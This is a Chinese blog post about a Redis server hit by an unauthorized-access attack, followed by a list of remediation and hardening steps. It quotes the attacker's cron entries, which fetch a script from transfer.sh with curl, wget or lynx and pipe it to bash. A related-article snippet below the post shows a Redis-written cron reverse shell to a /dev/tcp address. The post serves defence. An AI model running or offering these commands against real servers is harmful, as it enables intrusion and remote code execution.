redis漏洞防攻击

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: 安全攻略 缓存 文章标签: redis 漏洞
redis服务器遭攻击,症状:
1. redis中的缓存数据每10分钟全部被清;
2. 许多目录下多了root文件和一堆隐藏文件; 
3. redis多了三个Key:Backup1、Backup2、Backup3;
key值对应的内容如下:
Backup1: */2 * * * * curl -shttps://transfer.sh/GoZkF/tmp.DoRh9YAdFi > .cmd && bash .cmd
Backup2: */5 * * * * wget -O .cmd https://transfer.sh/GoZkF/tmp.DoRh9YAdFi&& bash .cmd
Backup3: */10 * * * * lynx -sourcehttps://transfer.sh/15TRyl/tmp.pCnR6is0Gm > .cmd && bash .cmd

应对措施:
1. 在非root用户下重新安装redis,对特定IP开放端口,如果只是本机使用,绑定127.0.0.1:6379 ,增加密码;
2. 清除定时任务;
3. 杀掉进程、删除木马文件;

预防措施:
1. 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,去掉前面的"#"即可(Redis本来就是作为内存数据库,只要监听在本机即可);
2. 设置密码访问认证,可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码 (需要重启Redis服务才能生效);
3. 对访问源IP进行访问控制,可在防火墙限定指定源ip才可以连接Redis服务器;
4. 修改Redis默认端口,将默认的6379端口修改为其他端口;
5. 禁用config指令避免恶意操作,在Redis配置文件redis.conf中配置rename-command"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度;
6. Redis使用普通用户权限,禁止使用 root 权限启动Redis 服务,这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限,无法获取root权限;

参考文档:
1. http://bbs.qcloud.com/thread-30706-1-1.html

hfhwfw
关注
专栏目录
Redis漏洞利用与
weixin_44023460的博客
06-19 183
Redis在大公司被大量应用,通过笔者的研究发现,目前在互联网上已经出现Redis未经授权病毒似自动攻击攻击成功后会对内网进行扫描、控制、感染以及用来进行挖矿、勒索等恶意行为,早期网上曾经分析过一篇文章“通过redis感染linux版本勒索病毒的服务器”(http://www.sohu.com/a/143409075_765820),如果公司使用了Redis,那么应当给予重视,通过实际研究,当在一定条件下,攻击者可以获取webshell,甚至root权限。 1.1.1 Redis简介及搭建实验环境 RE
Redis漏洞复现——Redis 4.x/5.x 未授权访问漏洞
Aquarius_ego的博客
03-30 4583
Redis 4.x/5.x 未授权访问漏洞复现
Redis 备份、容灾及高可用实战
09-13
Redis是一个高性能的key-value非关系型数据库,由于其具有高性能的特性,支持高可用、持久化、多种数据结构、集群等,使其脱颖而出,成为常用的非关系型数据库。
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1035
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
redis数据备份
kingforyang的博客
05-06 760
Redis数据备份redis数据备份思维导出新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 redis数据备份思维导出 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器
使用redis记录登录次数止暴力破解
佳佳乐的博客
03-06 2004
//向redis里存入数据和设置缓存时间 stringRedisTemplate.opsForValue().set("baike", "100", 60 * 10, TimeUnit.SECONDS); //val做-1操作 stringRedisTemplate.boundValueOps("baike").increment(-1); //根据key获取缓存中的val stri...
redis备份
weixin_44390164的博客
08-07 385
1. rdb备份 方式一:在客户端中输入保存命令 # 当前进程执行rdb备份 # 不建议使用 save # 调用fork函数生成子进程进行后台备份 bgsave 方式二:配置文件中配置自动rdb配置 # rdb自动执行的条件 # 900秒内有1个键发生变化就进行后台rdb存储 save 900 1 save 300 10 save 60 10000 方式三:服务器运行执行重启命令 debug reload 方式四:关闭服务器时指定保存数据 shutdown save 1. rd
Redis安全攻(二)Redis通过备份功能实现的三种攻击方法
慢就是快
03-29 569
0x01 利用redis备份写定时任务反弹shell 原理:利用redis备份功能进行文件操作 开始前可以做个备份,实际攻击中最好先执行config get dir 记清楚原来备份路径,方便还原擦除痕迹 利用redis-cli -h 目标ip 连接redis服务器 执行以下命令: set x "\n* * * * * bash -i >& /dev/tcp/192.168.199.187/7999 0>&1\n" //设置变量x,引号里为变量内容,这也备份的时候可以把
Redis漏洞总结
2301_77498991的博客
04-10 685
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
redis攻击还原
10-05
这些工具或概念可能包含了一些自动化攻击或渗透测试的特性,攻击者可能会利用这些工具快速发现和利用Redis漏洞。因此,了解这些工具和攻击方法,对进行有效的御至关重要。 综上所述,Redis攻击的还原涉及到未...
TP使用redis验证登录,止强制破解密码
weixin_41213085的博客
03-12 1004
使用TP自带函数,S函数,思路:使用一个函数用来验证输入次数;当输入错误是定义一个变量redisa为false,调用一个函数,其这个传过来变量redisa和username来用作缓存时名字;在登录时,一开始验证登录是否超过5次;之后在验证密码的时候,1、配置默认redis数据库 S(array(            'type'=>'redis',            'host'=&g...
解决redis的key都变成了backupredis所有缓存被清空
xianchao0127的博客
05-28 1605
找到redis的配置文件redis.conf重启redis容器,问题解析来源:Redis 未授权访问漏洞分析 cleanfda 脚本复现漏洞挖矿 https://www.renfei.net/posts/1003501。
Redis的数据变成backup
MoooJL
06-09 1978
redis的数据变成backup
利用redis解决恶意刷新和暴力请求
张钰杰杰杰杰杰的博客
05-29 672
利用ip+url止暴力请求
Docker部署Redis之DB0库中反复出现backup的解决方案
cm777的博客
04-14 779
租了腾讯云的服务器,使用Docker部署了Redis之后,发现DB0中总是出现4条key,分别是 backup01 backup02 backup03 backup04 而自己每次存入db0中的数据过一会就会被无缘无故删除掉,网上一查说是挖矿病毒.
解决redis的key都变成了backupredis所有缓存被清空(解决Docker容器时区不一致的问题)
小匠的Blog
06-09 1844
1、查看linux系统时区和docker容器时区 会发现主机和容器时区不一致解决方案1、利用Dockerfile创建镜像时。在Dockerfile中加入 2、容器创建时。加入时区挂载选项:-v /etc/localtime:/etc/localtime。实例: 3、容器已启动时。 参考原文:https://www.cnblogs.com/zhi-leaf/p/10604574.html.........
Redisbackup
weixin_33779515的博客
02-25 1172
增元素: [L/R]PUSH[X] k v [v ...] //O(1) 有无X后缀的区别是:有X的必须要求k指定的列表是存在的。无X后缀表示k对应的列表不存在则创建之 返回值:插入后列表中元素的数量。 错误:value非列表类型 弹出元素: [L/R]POP k //O(1) 返回值:左/右的元素 错误: key不存在,返回nil 长度查...
Redis之备份机制(一)
慢一拍的coder
08-31 1430
目录 1:写在前面 2:两种备份机制 2.1:RDB(redis-database) 2.2:AOF(append-only-file) 3:总结 1:写在前面 Redis是一种NOSQL数据库,和 memecache最大的区别是Redis是可以持久化的,那么是怎么持久化的呢,以及持久化的策略。 2:两种备份机制 2.1:RDB(redis-database) 1:当服务...
记录Redis和MySQL被扫描注入攻击
qq_44610529的博客
08-05 1322
no 弱密码
"Redis系列漏洞总结及常用命令解析
然而,正是由于其广泛应用和普及度,Redis也成为了攻击者的目标,各种Redis漏洞不断被揭示和利用。本文将总结一些常见的Redis漏洞,并提供相应的护措施。 1. Redis未授权访问漏洞 Redis的未授权访问漏洞一直是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值